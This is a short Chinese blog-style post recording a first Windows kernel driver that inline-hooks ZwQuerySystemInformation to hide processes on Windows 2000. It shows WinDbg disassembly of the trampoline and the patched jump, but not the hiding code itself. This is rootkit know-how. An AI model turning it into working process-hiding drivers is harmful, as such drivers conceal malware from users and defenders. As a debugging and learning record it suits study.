Ring0 Detour Demo

头一次写Driver,头一次用WinDbg+Vmware,头一次在ring0下做Detour.
不可思议的是,虽然调试出来错误很多,但是居然没有一次BSOD..
记录一下,Hook了ZwQuerySystemInformation做进程隐藏.
测试环境windows 2000 server sp4:

Hook前:

kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa b897000000 mov eax,97h
804011af 8d542404 lea edx,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi,edi

kd> u hookproc!Jmp_ZwQuerySystemInformation
hookproc!Jmp_ZwQuerySystemInformation [e:\tmp\rk\hide_proc\hide_proc.c @ 141]:
f41504d0 b897000000 mov eax,97h
f41504d5 eaaf1140800800 jmp 0008:804011AF
f41504dc 90 nop
f41504dd 90 nop
f41504de cc int 3
f41504df cc int 3
f41504e0 cc int 3
f41504e1 cc int 3
kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa e941f3d473 jmp hookproc!Fake_ZwQuerySystemInformation (f41504f0)
804011af 8d542404 lea edx,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi,edi
nt!ZwQuerySystemTime:
804011ba b898000000 mov eax,98h
804011bf 8d542404 lea edx,[esp+4]
804011c3 cd2e int 2Eh